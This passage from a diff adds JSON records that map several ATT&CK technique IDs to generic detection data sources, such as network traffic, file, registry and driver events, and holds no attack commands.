This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1557.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1588.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1547.012", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": 
"module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is 
attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ] + ] + }, + { + "technique_id": "T1598.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + 
"relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
